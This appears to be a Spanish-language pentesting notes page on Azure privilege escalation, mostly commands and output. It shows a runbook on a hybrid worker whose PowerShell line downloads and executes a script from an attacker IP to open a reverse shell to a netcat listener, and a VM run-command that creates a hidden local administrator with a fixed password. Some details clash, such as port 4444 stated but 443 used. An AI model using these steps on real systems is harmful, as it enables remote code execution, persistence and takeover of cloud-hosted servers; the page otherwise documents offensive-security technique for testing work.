Xtormin GithubLinkedIn

Escalada de privilegios

Automation Account

az automation account list
[
  {
    "creationTime": "2021-03-17T14:40:05.340000+00:00",
    "description": null,
    "etag": null,
    "id": "/subscriptions/b413824f-108d-4049-8c11-d52d5d386768/resourceGroups/Test/providers/Microsoft.Automation/automationAccounts/HybridAutomation",
    "lastModifiedBy": null,
    "lastModifiedTime": "2022-10-30T14:26:31.586666+00:00",
    "location": "switzerlandnorth",
    "name": "HybridAutomation",
    "resourceGroup": "Test",
    "sku": null,
    "state": null,
    "tags": {},
    "type": "Microsoft.Automation/AutomationAccounts"
  }
]
Get-AzAutomationHybridWorkerGroup -AutomationAccountName HybridAutomation -ResourceGroupName Test
ResourceGroupName     : Test
AutomationAccountName : HybridAutomation
Name                  : Workergroup1
RunbookWorker         : {defeng-adcsrv.defeng.corp}
GroupType             : User

Si se cuenta con un "hybrid runbookworker" podría ser posible ejecutar comandos en el servidor. Para ello se creará un runbook que cuente con un fichero powershell que contendrá el código malicioso que nos enviará el interprete de comandos a nuestra netcat.

  1. Crear un runbook:

Import-AzAutomationRunbook -Name test -Path C:\Pentest\Tools\rshell.ps1 -AutomationAccountName HybridAutomation -ResourceGroupName Test -Type PowerShell -Force -Verbose

Contenido del fichero rshell.ps1:

powershell "IEX (New-Object Net.Webclient).downloadstring('http://<IP atacante>:80/Invoke-PowerShellTcp.ps1');Power -Reverse -IPAddress <IP atacante> -Port <Puerto>"

  1. Publicar el runbook:

Publish-AzAutomationRunbook -RunbookName test -AutomationAccountName HybridAutomation -ResourceGroupName Engineering -Verbose

  1. Se pone el puerto 4444 a la escucha con netcat en la máquina del atacante:

C:\AzAD\Tools\netcat\nc64.exe -lvp 443

  1. Se ejecuta el runbook:

Start-AzAutomationRunbook -RunbookName test -RunOn Workergroup1 -AutomationAccountName HybridAutomation -ResourceGroupName Engineering -Verbose

Ejecución de comandos en VM por abuso de permisos

$passwd = ConvertTo-SecureString "Password@123" -AsPlainText -Force
New-LocalUser -Name usertest -Password $passwd 
Add-LocalGroupMember -Group Administrators -Member usertest

$AccessToken = '<JWT>'
Connect-AzAccount -AccessToken $AccessToken -AccountId 024aaf57-30af-45f0-840a-0e21ed143946

Get-AzVM -Name <máquina virtual> -ResourceGroupName <nombre de grupo> | select -ExpandProperty NetworkProfile
Invoke-AzVMRunCommand -VMName <máquina virtual> -ResourceGroupName Engineering -CommandId 'RunPowerShellScript' -ScriptPath 'C:\Pentest\Tools\adduser.ps1' -Verbose
AnteriorRecursos de AzureSiguientePerímetro

Última actualización

¿Te fue útil?